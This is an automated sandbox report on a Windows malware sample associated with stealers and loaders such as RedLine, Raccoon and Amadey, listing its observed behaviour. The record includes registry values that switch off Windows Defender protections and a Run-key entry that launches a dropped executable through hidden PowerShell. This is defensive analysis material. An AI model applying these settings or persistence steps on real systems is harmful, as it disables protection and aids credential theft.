Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-g3t9gsef4y
Target 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d
SHA256 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d

Threat Level: Known bad

The file 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan

Glupteba payload

RedLine

Raccoon Stealer payload

DcRat

SmokeLoader

Amadey

Raccoon

ZGRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

RedLine payload

Detect ZGRat V1

Modifies Windows Defender Real-time Protection settings

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Windows security modification

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 06:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 06:20

Reported

2023-10-26 06:23

Platform

win10v2004-20231020-en

Max time kernel

122s

Max time network

163s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EF25.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5464.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\58CA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7CCF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\924D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9675.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF25.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F0BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F282.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FAEF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSFBEF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3FD9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F0BC.exe'\"" C:\Users\Admin\AppData\Local\Temp\F0BC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\5464.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Drive Tools\is-NF51C.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2JUKL.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-D48GH.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2RMV7.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-3ODBG.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-155AO.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-LR12U.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-PMTJ0.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-VU1P4.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-6Q0TS.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UNODB.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-CM61S.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-23T0I.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-BRBO7.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-B8737.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\Lang\is-64KO5.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\Drive Tools\is-V6AHL.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-J04IR.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-BPL08.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-AI8B8.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2EKR1.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\9675.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
